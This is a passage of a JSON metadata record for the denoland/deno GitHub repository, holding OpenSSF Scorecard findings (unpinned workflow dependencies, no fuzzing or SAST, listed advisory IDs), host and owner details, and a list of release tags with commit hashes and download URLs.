https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms